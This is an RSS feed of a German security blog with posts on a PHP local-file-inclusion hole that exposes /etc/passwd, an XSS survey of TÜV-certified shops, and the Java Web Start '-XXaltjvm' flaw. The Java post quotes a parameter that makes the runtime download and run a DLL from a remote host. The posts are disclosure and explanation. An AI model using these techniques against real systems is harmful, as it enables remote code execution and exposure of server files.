<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Benjamin Flesch &#187; Sicherheit und Sonnenschein</title>
	<atom:link href="http://blog.bf-itservice.de/category/sicherheit-und-sonnenschein/feed" rel="self" type="application/rss+xml" />
	<link>http://blog.bf-itservice.de</link>
	<description>Programmkot &#38; Sicherheit</description>
	<lastBuildDate>Mon, 16 Aug 2010 12:00:56 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<item>
		<title>Unsicherer PHP-Programmierer</title>
		<link>http://blog.bf-itservice.de/394/unsicherer-php-programmierer</link>
		<comments>http://blog.bf-itservice.de/394/unsicherer-php-programmierer#comments</comments>
		<pubDate>Mon, 16 Aug 2010 12:00:56 +0000</pubDate>
		<dc:creator>Beni</dc:creator>
				<category><![CDATA[Fehlerteufel]]></category>
		<category><![CDATA[Programmieren]]></category>
		<category><![CDATA[Sicherheit und Sonnenschein]]></category>
		<category><![CDATA[Tipps&Tricks]]></category>
		<category><![CDATA[Hack]]></category>
		<category><![CDATA[Job]]></category>
		<category><![CDATA[Local File Inclusion]]></category>
		<category><![CDATA[Perl]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[PHP Hardening]]></category>
		<category><![CDATA[Sicherheitslücken]]></category>

		<guid isPermaLink="false">http://blog.bf-itservice.de/?p=394</guid>
		<description><![CDATA[Seit einigen Tagen habe eine Stelle als PHP-Programmierer ausgeschrieben und auf diese Weise jemanden gesucht, die mir bei aufwändigen Arbeiten etwas hilft. Ich habe schon viele gute Bewerbungen erhalten, aber sie waren alle nichts gegen den Kerl, der heute morgen per Email hereingeflogen kam. Die Eckdaten waren schonmal vielversprechend: 12+ years PHP experience 8+ years [...]]]></description>
			<content:encoded><![CDATA[<p>Seit einigen Tagen habe eine Stelle als <strong>PHP-Programmierer</strong> ausgeschrieben und auf diese Weise jemanden gesucht, die mir bei aufwändigen Arbeiten etwas hilft.</p>
<p>Ich habe schon viele gute Bewerbungen erhalten, aber <strong>sie waren alle nichts</strong> gegen den Kerl, der heute morgen per Email hereingeflogen kam. Die Eckdaten waren schonmal vielversprechend:</p>
<ul>
<li>12+ years PHP experience</li>
<li>8+ years Perl experience</li>
<li>sehr ansprechender Stundenlohn</li>
</ul>
<p>Das klingt nach einem <strong>Perl-Guru</strong>, der dann auf PHP umgesattelt ist, nicht wahr?</p>
<p>Es wurden <strong>zwei PHP-Projekte zur Referenz</strong> angeboten, direkt mal angeschaut und <strong>vom Stuhl gefallen</strong>. Der Grund ist nicht wirklich schwer zu finden, die URL sah wie folgt aus:</p>
<p><code>http://XXXXXXXXXXXX.com/<strong>?main=pce/index.php</strong></code></p>
<p>Für die Personen die spätestens jetzt total verwirrt sind: Der Homepage wird hinter dem <strong>?</strong> der Variable <strong>main</strong> die Adresse zu einem PHP-Script zugewiesen (und zwar <strong>pce/index.php</strong>). </p>
<p>Wenn man also den Inhalt von <strong>main</strong> entsprechend verändert, kann man beliebige Dateien des Servers anzeigen. Beispiel:</p>
<p><a href="http://blog.bf-itservice.de/wp-content/uploads/2010/08/urk.png"><img src="http://blog.bf-itservice.de/wp-content/uploads/2010/08/urk.png" alt="" title="urk" width="562" height="38" class="alignnone size-full wp-image-396" /></a></p>
<p>So können wir die Datei <strong>/etc/passwd</strong> auslesen, in der Informationen über die Benutzeraccounts eines Linux-Systems gespeichert sind. Natürlich ist jetzt auch nicht mehr weit bis zu einem erfolgreichen Hack, aber darum geht es an dieser Stelle auch nicht.</p>
<p><a href="http://blog.bf-itservice.de/wp-content/uploads/2010/08/passwd.png"><img src="http://blog.bf-itservice.de/wp-content/uploads/2010/08/passwd-300x227.png" alt="Benutzerliste des Servers - /etc/passwd" title="passwd" width="300" height="227" class="alignleft size-medium wp-image-397" /></a></p>
<p>Es gab noch einige weitere Sicherheitslücken in seinen Referenzprojekten, und nett wie ich bin habe ich sie ihm natürlich auch sofort mitgeteilt. </p>
<p>Den Job wird er aber nicht bekommen und hiermit verabschiede ich mich, sprachlos. <img src='http://blog.bf-itservice.de/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://blog.bf-itservice.de/394/unsicherer-php-programmierer/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Kritische Sicherheitslücke im Java Runtime Environment (JRE)</title>
		<link>http://blog.bf-itservice.de/362/kritische-sicherheitslucke-im-java-runtime-environment-jre</link>
		<comments>http://blog.bf-itservice.de/362/kritische-sicherheitslucke-im-java-runtime-environment-jre#comments</comments>
		<pubDate>Fri, 09 Apr 2010 16:01:50 +0000</pubDate>
		<dc:creator>Beni</dc:creator>
				<category><![CDATA[Fehlerteufel]]></category>
		<category><![CDATA[Sicherheit und Sonnenschein]]></category>
		<category><![CDATA[]]></category>
		<category><![CDATA[-J-XXaltjvm]]></category>
		<category><![CDATA[-XXaltjvm]]></category>
		<category><![CDATA[Chrome]]></category>
		<category><![CDATA[Command Execution]]></category>
		<category><![CDATA[Firefox]]></category>
		<category><![CDATA[Java]]></category>
		<category><![CDATA[JRE]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[Remote File Inclusion]]></category>
		<category><![CDATA[Sicherheitslücke]]></category>

		<guid isPermaLink="false">http://blog.bf-itservice.de/?p=362</guid>
		<description><![CDATA[Wie Reverse Mode heute morgen berichtete, gibt es eine ziemlich schlimme Sicherheitslücke beim Verarbeiten von JAVA-Einbindungen durch Browser, die das Java-Plugin installiert haben &#8212; und das ist so ziemlich jeder Browser, den es gibt. Auch Chrome und Firefox sind betroffen, genauso wie die entsprechenden Linux-Versionen des JREs. Bei der Sicherheitslücke handelt sich um eine Command [...]]]></description>
			<content:encoded><![CDATA[<p>Wie <a href="http://www.reversemode.com/index.php?option=com_content&amp;task=view&amp;id=67&amp;Itemid=1">Reverse Mode</a> heute morgen berichtete, gibt es eine ziemlich schlimme Sicherheitslücke beim Verarbeiten von JAVA-Einbindungen durch Browser, die das Java-Plugin installiert haben &#8212; und das ist so ziemlich jeder Browser, den es gibt. Auch Chrome und Firefox sind betroffen, genauso wie die entsprechenden Linux-Versionen des JREs.</p>
<p>Bei der Sicherheitslücke handelt sich um eine <strong>Command Execution Vulnerability</strong> die durch unterlassenes Überprüfen der Aufrufparameter von <code>javaws.exe</code> entstanden ist. Wenn ein bei der Einbindung von Java-Applets angegebener Parameter in der Form vom <code>" -XXaltjvm="\\12.34.56.78\virus.dll</code> vorliegt, wird von dem Java Runtime Environment die Datei unter <code>\\12.34.56.78\virus.dll</code> heruntergeladen und ausgeführt. Ooops!</p>
<p>Der folgende Codeschnipsel dürfte genügend Aufschluss über die Einbindung der betroffenen Parameter <code>docbase</code> und <code>launchjlnp</code> geben.</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
9
10
</pre></td><td class="code"><pre class="php" style="font-family:monospace;"><span style="color: #b1b100;">if</span> <span style="color: #009900;">&#40;</span>browser <span style="color: #339933;">==</span> <span style="color: #0000ff;">'MSIE'</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span>
	document<span style="color: #339933;">.</span>write<span style="color: #009900;">&#40;</span><span style="color: #0000ff;">'&lt;'</span> <span style="color: #339933;">+</span> <span style="color: #0000ff;">'object classid=&quot;clsid:8AD9C840-044E-11D1-B3E9-00805F499D93&quot; '</span>
		<span style="color: #339933;">+</span> <span style="color: #0000ff;">'width=&quot;0&quot; height=&quot;0&quot;&gt;'</span> <span style="color: #339933;">+</span> <span style="color: #0000ff;">'&lt;'</span> <span style="color: #339933;">+</span> <span style="color: #0000ff;">'PARAM name=&quot;launchjnlp&quot; value=&quot;'</span> <span style="color: #339933;">+</span> jnlp <span style="color: #339933;">+</span> <span style="color: #0000ff;">'&quot;'</span> <span style="color: #339933;">+</span> <span style="color: #0000ff;">'&gt;'</span>
		<span style="color: #339933;">+</span> <span style="color: #0000ff;">'&lt;'</span> <span style="color: #339933;">+</span> <span style="color: #0000ff;">'PARAM name=&quot;docbase&quot; value=&quot;'</span> <span style="color: #339933;">+</span> jnlpDocbase <span style="color: #339933;">+</span> <span style="color: #0000ff;">'&quot;'</span> <span style="color: #339933;">+</span> <span style="color: #0000ff;">'&gt;'</span>
		<span style="color: #339933;">+</span> <span style="color: #0000ff;">'&lt;'</span> <span style="color: #339933;">+</span> <span style="color: #0000ff;">'/'</span> <span style="color: #339933;">+</span> <span style="color: #0000ff;">'object'</span> <span style="color: #339933;">+</span> <span style="color: #0000ff;">'&gt;'</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #009900;">&#125;</span> <span style="color: #b1b100;">else</span> <span style="color: #b1b100;">if</span> <span style="color: #009900;">&#40;</span>browser <span style="color: #339933;">==</span> <span style="color: #0000ff;">'Netscape Family'</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span>
	document<span style="color: #339933;">.</span>write<span style="color: #009900;">&#40;</span><span style="color: #0000ff;">'&lt;'</span> <span style="color: #339933;">+</span> <span style="color: #0000ff;">'embed type=&quot;application/x-java-applet;jpi-version='</span>
		<span style="color: #339933;">+</span> deployJava<span style="color: #339933;">.</span>firefoxJavaVersion <span style="color: #339933;">+</span> <span style="color: #0000ff;">'&quot; '</span> <span style="color: #339933;">+</span> <span style="color: #0000ff;">'width=&quot;0&quot; height=&quot;0&quot; '</span>
		<span style="color: #339933;">+</span> <span style="color: #0000ff;">'launchjnlp=&quot;'</span> <span style="color: #339933;">+</span>  jnlp <span style="color: #339933;">+</span> <span style="color: #0000ff;">'&quot;'</span> <span style="color: #339933;">+</span> <span style="color: #0000ff;">'docbase=&quot;'</span> <span style="color: #339933;">+</span>  jnlpDocbase <span style="color: #339933;">+</span> <span style="color: #0000ff;">'&quot;'</span> <span style="color: #339933;">+</span>	<span style="color: #0000ff;">' /&gt;'</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #009900;">&#125;</span></pre></td></tr></table></div>

<p>Bis zu einem Schließen dieser Sicherheitslücke sollte jeder im Browser Java ausstellen.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.bf-itservice.de/362/kritische-sicherheitslucke-im-java-runtime-environment-jre/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Etwas Computerforensik gefällig?</title>
		<link>http://blog.bf-itservice.de/343/etwas-computerforensik-gefallig</link>
		<comments>http://blog.bf-itservice.de/343/etwas-computerforensik-gefallig#comments</comments>
		<pubDate>Mon, 29 Mar 2010 15:58:54 +0000</pubDate>
		<dc:creator>Beni</dc:creator>
				<category><![CDATA[Sicherheit und Sonnenschein]]></category>
		<category><![CDATA[Dateianalyse]]></category>
		<category><![CDATA[Forensics Wiki]]></category>
		<category><![CDATA[IT-Forensik]]></category>

		<guid isPermaLink="false">http://blog.bf-itservice.de/?p=343</guid>
		<description><![CDATA[Wer schon immer mal in die Computerforensik hinein schnuppern wollte, dem kann ich nur das englischsprachige Forensics Wiki ans Herzen legen: Vom Aufspüren von versteckten Daten über Dateianalyse bis hin zur Abwehr von Computerforensik ist dort jeder Themenbereich der IT-Forensik mit aufschlussreichen Artikeln abgedeckt. Vor allem die Netzwerkforensik (link) ist meiner Meinung nach ein hochinteressantes [...]]]></description>
			<content:encoded><![CDATA[<p>Wer schon immer mal in die Computerforensik hinein schnuppern wollte, dem kann ich nur das englischsprachige <a href="http://www.forensicswiki.org/wiki/Main_Page">Forensics Wiki</a> ans Herzen legen: </p>
<p>Vom <strong>Aufspüren von versteckten Daten</strong> über <strong>Dateianalyse</strong> bis hin zur <strong>Abwehr von Computerforensik</strong> ist dort jeder Themenbereich der IT-Forensik mit aufschlussreichen Artikeln abgedeckt. Vor allem die Netzwerkforensik (<a href="http://www.forensicswiki.org/wiki/Network_forensics">link</a>) ist meiner Meinung nach ein hochinteressantes Thema.</p>
<p>Ich hoffe, dieses Thema wird nun noch weitere Fans finden! <img src='http://blog.bf-itservice.de/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://blog.bf-itservice.de/343/etwas-computerforensik-gefallig/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>WordPress 2.8.5 Security Flaw</title>
		<link>http://blog.bf-itservice.de/289/wordpress-2-8-5-security-fla</link>
		<comments>http://blog.bf-itservice.de/289/wordpress-2-8-5-security-fla#comments</comments>
		<pubDate>Tue, 10 Nov 2009 23:17:10 +0000</pubDate>
		<dc:creator>Beni</dc:creator>
				<category><![CDATA[Sicherheit und Sonnenschein]]></category>

		<guid isPermaLink="false">http://blog.bf-itservice.de/?p=289</guid>
		<description><![CDATA[Habe soeben mal eine Sicherheitslücke in WordPress 2.8.5 gemeldet. Mal schauen ob sie mich diesmal verlinken Update: Antwort bereits eingetroffen, sie arbeiten an einem Fix. Nett. Update: Und jetzt gibt es auch WordPress 2.8.6, alle schön updaten!]]></description>
			<content:encoded><![CDATA[<p>Habe soeben mal eine Sicherheitslücke in WordPress 2.8.5 gemeldet. Mal schauen ob sie mich diesmal verlinken <img src='http://blog.bf-itservice.de/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<p><strong>Update:</strong> Antwort bereits eingetroffen, sie arbeiten an einem Fix. Nett.</p>
<p><strong>Update: </strong>Und jetzt gibt es auch <a href="http://wordpress.org/development/2009/11/wordpress-2-8-6-security-release/">WordPress 2.8.6</a>, alle schön updaten!</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.bf-itservice.de/289/wordpress-2-8-5-security-fla/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>TÜV SÜD Prüfsiegel &amp; die bösen Sicherheitslücken</title>
		<link>http://blog.bf-itservice.de/238/tuev-sued-pruefsiegel-sicherheitsluecken</link>
		<comments>http://blog.bf-itservice.de/238/tuev-sued-pruefsiegel-sicherheitsluecken#comments</comments>
		<pubDate>Fri, 30 Oct 2009 19:43:57 +0000</pubDate>
		<dc:creator>Beni</dc:creator>
				<category><![CDATA[Politisches]]></category>
		<category><![CDATA[Sicherheit und Sonnenschein]]></category>
		<category><![CDATA[Audible.de]]></category>
		<category><![CDATA[Borromedien]]></category>
		<category><![CDATA[libri.de]]></category>
		<category><![CDATA[Reifendirekt.de]]></category>
		<category><![CDATA[safer-shopping.de]]></category>
		<category><![CDATA[Sicherheitslücken]]></category>
		<category><![CDATA[Sicherheitssiegel]]></category>
		<category><![CDATA[TÜV SÜD]]></category>
		<category><![CDATA[Websicherheit]]></category>
		<category><![CDATA[weg.de]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://blog.bf-itservice.de/?p=238</guid>
		<description><![CDATA[oder: Sicherheitslücken in Audible.de, Borromedien.de, ReifenDirekt.de, weg.de und safer-shopping.de Anmerkung: Diese Story ist nicht als Eigenwerbung gedacht, und es würde mir sehr leid tun, wenn es so rüberkommt. Die ganze Sache hat mich rein privat verfolgt und ich beschloss mal einen Blick drauf zu werfen! Als ich heute Mittag auf Fefe&#8217;s Blog über den Libri-Datenskandal [...]]]></description>
			<content:encoded><![CDATA[<h1><strong><em>oder:</em></strong> Sicherheitslücken in Audible.de, Borromedien.de, ReifenDirekt.de, weg.de und safer-shopping.de</h1>
<p><strong>Anmerkung:</strong> Diese Story ist nicht als Eigenwerbung gedacht, und es würde mir sehr leid tun, wenn es so rüberkommt. Die ganze Sache hat mich rein privat verfolgt und ich beschloss mal einen Blick drauf zu werfen!</p>
<p>Als ich heute Mittag auf <a href="http://blog.fefe.de/?ts=b41420cb">Fefe&#8217;s Blog über den Libri-Datenskandal</a> im Bezug auf das <strong>Homepage-Sicherheitssigel des TÜV SÜD</strong> gelesen habe, war für mich eines sofort klar:</p>
<p>Mein Softwareprojekt wird an diesem Freitagmittag keine großen Sprünge mehr machen, und ich werde diesem ominösen, aber auch<strong> sehr seriös anmutenden Sicherheitssiegel</strong> auf den Zahn fühlen!</p>
<p>Gesagt, getan. Die <a href="http://www.safer-shopping.de">Homepage des TÜV SÜD zu diesem lukrativen Geschäftsfeld</a> zeigt ein mit <strong>McAfee SECURE</strong> &#8211; vormals <strong>HackerSafe</strong> &#8211; vergleichbares Geschäftskonzept auf: Man zahle für eine Sicherheitsüberprüfung der Homepage, dann darf man sich mit einem kleinen Bild schmücken das Sicherheit suggeriert.</p>
<p>Schon bei HackerSafe gab es <a href="http://www.heise.de/security/meldung/McAfees-HackerSafe-Zertifizierung-fragwuerdig-204677.html">harsche Kritik</a> wegen der allzu bereitwilligen Vergabe des Prädikats <strong>&#8220;Dies ist eine sichere Webseite, gib uns all deine Daten&#8221;</strong>, und die wird es nach Lektüre dieses Beitrags verdientermaßen auch beim TÜV SÜD geben.</p>
<p>.. also nahm ich kurzfristig einige Stichproben aus den <a href="http://www.safer-shopping.de/index.php?id=zertifikate&amp;no_cache=1">Referenzkunden</a> unter die Lupe; ein kurzer Test auf XSS und SQL-Injection, das übliche eben.</p>
<h2>Auf der Hälfte der von mir &#8220;überprüften&#8221; Seiten existieren Sicherheitslücken.</h2>
<ul>
<li>Audible.de</li>
<li>Borromedien.de</li>
<li>ReifenDirekt.de</li>
<li>weg.de</li>
<li>.. <strong>und sogar auf safer-shopping.de, der TÜV-eigenen Seite</strong> !!!</li>
</ul>
<h1>Welche Art von Sicherheitslücken?</h1>
<blockquote><p>Die Sicherheitslücken wurden durch Screenshots dokumentiert, um die angesprochenen Webseiten nicht in Verlegenheit zu bringen. Sie sind aber allesamt auch von einem 16jährigen mit etwas Fleiß auffindbar. Und auch wenn es sich nur um <strong>Cross-Site Scripting</strong> (<a href="http://de.wikipedia.org/wiki/XSS">XSS</a>) handelt, kann man damit von <strong>Session-Hijacking</strong> über <strong>Phishing</strong> bis zu einem <a href="http://mybeni.rootzilla.de/mybeNi/2007/this_is_the_first_weblog_xss_worm/"><strong>XSS-Wurm</strong></a> viele lustige Sachen machen. Vor allem mit einem vertrauenserweckenden <code>https://</code> in der Adresse! <img src='http://blog.bf-itservice.de/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p></blockquote>
<h1>Audible.de Sicherheitslücke</h1>
<p><div id="attachment_255" class="wp-caption alignright" style="width: 160px"><a href="http://blog.bf-itservice.de/wp-content/uploads/2009/10/audible-xss.jpg"><img class="size-thumbnail wp-image-255" title="Audible.de XSS Sicherheitslücke" src="http://blog.bf-itservice.de/wp-content/uploads/2009/10/audible-xss-150x150.jpg" alt="Audible.de XSS Sicherheitslücke" width="150" height="150" /></a><p class="wp-caption-text">Audible.de Sicherheitslücke: Die Banane tanzt.</p></div></p>
<p>Auf <a href="http://www.audible.de">Audible.de</a> ist das TÜV SÜD Sicherheitssiegel ziemlich versteckt <strong>am Rand der Homepage unten links</strong> angebracht. Die Seite erscheint auch sehr solide, jedenfalls bis man sich etwas tiefer in die Archive eingräbt, und sie funktioniert auch mit einem <code>https://</code> am Anfang der URL. Feine Sache!</p>
<h1 style="clear:both">Borromedien.de Sicherheitslücke</h1>
<p><div id="attachment_256" class="wp-caption alignright" style="width: 160px"><a href="http://blog.bf-itservice.de/wp-content/uploads/2009/10/borromedien-xss.jpg"><img class="size-thumbnail wp-image-256" title="borromedien-xss" src="http://blog.bf-itservice.de/wp-content/uploads/2009/10/borromedien-xss-150x150.jpg" alt="Borromedien XSS Sicherheitslücke" width="150" height="150" /></a><p class="wp-caption-text">Borromedien XSS Sicherheitslücke</p></div></p>
<p>Ein weiter Bücherversand, von dem ich vorher noch nie gehört habe. Das TÜV-Siegel ist eindrucksvoll <strong>unter dem Login-Feld</strong> angebracht, und in dessen direktem Umfeld tritt ironischerweise eine <strong>Cross-Site Scripting</strong> Lücke auf. Ich hätte gerne ein schöneres Fundstück auf Borromedien präsentiert, aber der Programmierer hat scheinbar einen Sinn für Humor! <img src='http://blog.bf-itservice.de/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<h1 style="clear:both">ReifenDirekt.de / delti.com Sicherheitslücke</h1>
<p><div id="attachment_259" class="wp-caption alignright" style="width: 160px"><a href="http://blog.bf-itservice.de/wp-content/uploads/2009/10/reifendirekt-xss.jpg"><img class="size-thumbnail wp-image-259" title="reifendirekt-xss" src="http://blog.bf-itservice.de/wp-content/uploads/2009/10/reifendirekt-xss-150x150.jpg" alt="ReifenDirekt.de Sicherheitslücke, schön mit https://. Auf die Sache mit der Banane bin ich immernoch stolz!" width="150" height="150" /></a><p class="wp-caption-text">ReifenDirekt.de Sicherheitslücke mit SSL-Unterstützung. Auf die Sache mit der Banane bin ich immernoch stolz!</p></div></p>
<p>Reifendirekt.de ist ein sehr guter und auch preiswerter <strong>Reifenversand</strong>, ich habe dort letzt erst Sommerreifen gekauft. Leider läuft die ganze Seite über <code>https://</code>, und da macht sich eine XSS-Lücke leider nicht gut. Das TÜV-Siegel haben sie zum Glück aber schon mal in Richtung Seitenende verschoben. Die Lücke gibts umsonst <img src='http://blog.bf-itservice.de/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<h1 style="clear:both">weg.de Sicherheitslücke</h1>
<p><div id="attachment_261" class="wp-caption alignright" style="width: 160px"><a href="http://blog.bf-itservice.de/wp-content/uploads/2009/10/weg-xss.jpg"><img class="size-thumbnail wp-image-261" title="weg-xss" src="http://blog.bf-itservice.de/wp-content/uploads/2009/10/weg-xss-150x150.jpg" alt="weg.de Sicherheitslücke, wenn auch nur auf optionaler Domain. Banana's still dancing!" width="150" height="150" /></a><p class="wp-caption-text">weg.de Sicherheitslücke, wenn auch nur auf optionaler Domain. Banana&#39;s still dancing!</p></div></p>
<p>Weg.de hat es schon ein bisschen schwerer gemacht. Aber es ist natürlich logisch dass Benutzerinput gut gefiltert wird, wenn die Software <strong>den ganzen Tag Suchanfragen nach nettem Urlaub parsen muss</strong>.</p>
<p>Das ist nun nicht ganz weg.de sondern <strong>cardelmar.de</strong>, aber afaik benutzen die nur eine eigene Domain für eine bestimmte Urlaubskategorie. Auf ein paar anderen zur Seite gehörenden Domains bröckelt es auch ein bisschen..</p>
<h1 style="clear:both">TÜV SÜD (safer-shopping.de) Sicherheitslücke</h1>
<p><img class="size-thumbnail wp-image-254 alignleft" title="tüv-logo" src="http://blog.bf-itservice.de/wp-content/uploads/2009/10/tüv-logo-150x88.jpg" alt="tüv-logo" width="150" height="88" /></p>
<p><div id="attachment_257" class="wp-caption alignright" style="width: 160px"><a href="http://blog.bf-itservice.de/wp-content/uploads/2009/10/tüv-xss.jpg"><img class="size-thumbnail wp-image-257" title="tüv-xss" src="http://blog.bf-itservice.de/wp-content/uploads/2009/10/tüv-xss-150x150.jpg" alt="Safer-Shopping.de Sicherheitslücke (TÜV SÜD). Jetzt hat sich die Banane eingebrannt, nicht wahr?" width="150" height="150" /></a><p class="wp-caption-text">Safer-Shopping.de Sicherheitslücke (TÜV SÜD). Jetzt hat sich die Banane eingebrannt, nicht wahr?</p></div></p>
<p>.. last but not least gibt es auf der <a href="https://www.safer-shopping.de/">Sicherheits-Homepage des TÜV SÜD</a> eine nette Sicherheitslücke. Mit SSL.</p>
<p>Damit verliert die ganze Sache mit dem Sicherheitssiegel leider enorm an Glaubwürdigkeit, wenn der einzige Punkt im Programm, an dem ein String als Parameter akzeptiert wird die Filterung nicht richtig hinbekommt.</p>
<p>Dies sind die Momente, die das Leben wieder lebenswert machen <img src='http://blog.bf-itservice.de/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<h1 style="clear:both">Fazit</h1>
<p>Bis auf große Versicherungsgesellschaften wie <strong>AXA</strong>, <strong>HanseMerkur</strong> und <strong>Karstadt-Quelle Versicherungen</strong>, sind die vom <strong>TÜV SÜD für besondere Homepagesicherheit zertifizierten</strong> Webshops <strong>kein Deut sicherer als andere Seiten</strong>.</p>
<p>Selbst <strong>ohne Benutzerkonto</strong> präsentieren sie bösartigen Personen <strong>genügend Angriffsfläche</strong> für allerlei Sachen die am Ende die Kunden ausbaden müssen. Unter einer <strong>Sicherheitszertifizierung</strong> hätte ich mir zumindest einen <strong>groben Penetrationtest</strong> vorgestellt, der bei den aufgezeigten Homepages <strong>mit großer Wahrscheinlichkeit nicht durchgeführt wurde</strong>, da selbst ein Wald-und-Wiesen-Hacker wie ich Erfolg hatte.</p>
<p>Zum Nachdenken: Für diesen Report habe ich inkl. Artikelschreiben <strong>ca. 3 Stunden</strong> benötigt, für ein kommerzielles Siegel kann man doch wohl einen Studenten kurz drüberschauen lassen, oder? <img src='http://blog.bf-itservice.de/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<h1>Anmerkungen</h1>
<p><span style="text-decoration: line-through;">Falls Sie mit einer der angesprochenen Webseiten etwas am Hut haben, so schreiben sie mich an und ich zeige ihnen gerne den genauen Ort der Sicherheitslücken, damit die Sache möglichst schnell aus der Welt geschafft ist. Kontaktmöglichkeiten siehe <a href="http://www.bf-itservice.de/kontakt/">Impressum</a>.</span></p>
<p><strong>EDIT: </strong>Da ich jetzt schon darauf angesprochen wurde: Ja, die Sicherheitslücken wurden den jeweiligen Homepages natürlich sofort auf verschiedenen Wegen mitgeteilt. Mit dem Aufruf zur Kontaktaufnahme in diesem Blogpost wollte ich nur die Sysadmins erreichen, die man eher auf Heise als im Kundensupport findet. Wenn ein Unternehmen erstmal die Alexa-5000 &#8220;Schallmauer&#8221; durchbrochen hat, dann dauert es manchmal länger, bis das Supportticket den richtigen Bearbeiter findet, als wenn der IT-ler eines Unternehmens die Sache sowieso in den News liest und sich nicht an mich herantraut.</p>
<p><span style="text-decoration: line-through;">Falls jemandem von den Quadratwurzeln meine 2 Cents gefallen hat so möge er sich doch bitte bei mir melden.</span> Schon erledigt, dankeschön!</p>
<p>Alle Rechtschreibfehler dürfen behalten werden, ich genieße ab sofort meinen Freitag Abend! <img src='http://blog.bf-itservice.de/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://blog.bf-itservice.de/238/tuev-sued-pruefsiegel-sicherheitsluecken/feed</wfw:commentRss>
		<slash:comments>10</slash:comments>
		</item>
		<item>
		<title>This is a dofollow blog</title>
		<link>http://blog.bf-itservice.de/177/this-is-a-dofollow-blog</link>
		<comments>http://blog.bf-itservice.de/177/this-is-a-dofollow-blog#comments</comments>
		<pubDate>Wed, 21 Jan 2009 13:45:57 +0000</pubDate>
		<dc:creator>Beni</dc:creator>
				<category><![CDATA[Sicherheit und Sonnenschein]]></category>
		<category><![CDATA[blog comment]]></category>
		<category><![CDATA[dofollow]]></category>
		<category><![CDATA[nofollow]]></category>
		<category><![CDATA[wp-comment.php]]></category>

		<guid isPermaLink="false">http://blog.bf-itservice.de/?p=177</guid>
		<description><![CDATA[I&#8217;ve just deleted all these stupid rel="external nofollow" attributes from wp-comment.php. What does that mean for you? From now on, all comments will create two followed outbound links to your website]]></description>
			<content:encoded><![CDATA[<p>I&#8217;ve just deleted all these stupid <code>rel="external nofollow"</code> attributes from wp-comment.php. What does that mean for you? From now on, all comments will create <strong>two followed outbound links</strong> to your website <img src='http://blog.bf-itservice.de/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://blog.bf-itservice.de/177/this-is-a-dofollow-blog/feed</wfw:commentRss>
		<slash:comments>10</slash:comments>
		</item>
		<item>
		<title>Eine Reise nach Brasilien: SEO de Janeiro!</title>
		<link>http://blog.bf-itservice.de/168/eine-reise-nach-brasilien-seo-de-janeiro</link>
		<comments>http://blog.bf-itservice.de/168/eine-reise-nach-brasilien-seo-de-janeiro#comments</comments>
		<pubDate>Wed, 19 Nov 2008 00:22:38 +0000</pubDate>
		<dc:creator>Beni</dc:creator>
				<category><![CDATA[Sicherheit und Sonnenschein]]></category>
		<category><![CDATA[Blackhat]]></category>
		<category><![CDATA[Brasilien]]></category>
		<category><![CDATA[Karneval in Rio]]></category>
		<category><![CDATA[Quadzilla]]></category>
		<category><![CDATA[SEO de Janeiro]]></category>
		<category><![CDATA[SEO Party]]></category>

		<guid isPermaLink="false">http://blog.bf-itservice.de/?p=168</guid>
		<description><![CDATA[Man kommt also spät abends von der Freundin nach Hause, schmeißt den Messenger an und denkt sich nichts böses; Und dann flattert einem vom lieben Quads eine Einladung zur SEO De Janeiro, der Brasilianischen Karneval-Fortsetzung des SEOktoberfests aus München, vor die Nase: The following SEO Black Hat Forum members have been hand selected to get [...]]]></description>
			<content:encoded><![CDATA[<p>Man kommt also spät abends von der <a href="http://young-and-sexy.blogspot.com/">Freundin</a> nach Hause, schmeißt den Messenger an und denkt sich nichts böses; Und dann flattert einem vom lieben Quads <a href="http://seoblackhat.com/2008/11/17/top-forum-contributers-get-free-invite-to-seo-de-janeiro/">eine Einladung zur SEO De Janeiro</a>, der <strong>Brasilianischen Karneval-Fortsetzung des SEOktoberfests aus München</strong>, vor die Nase:</p>
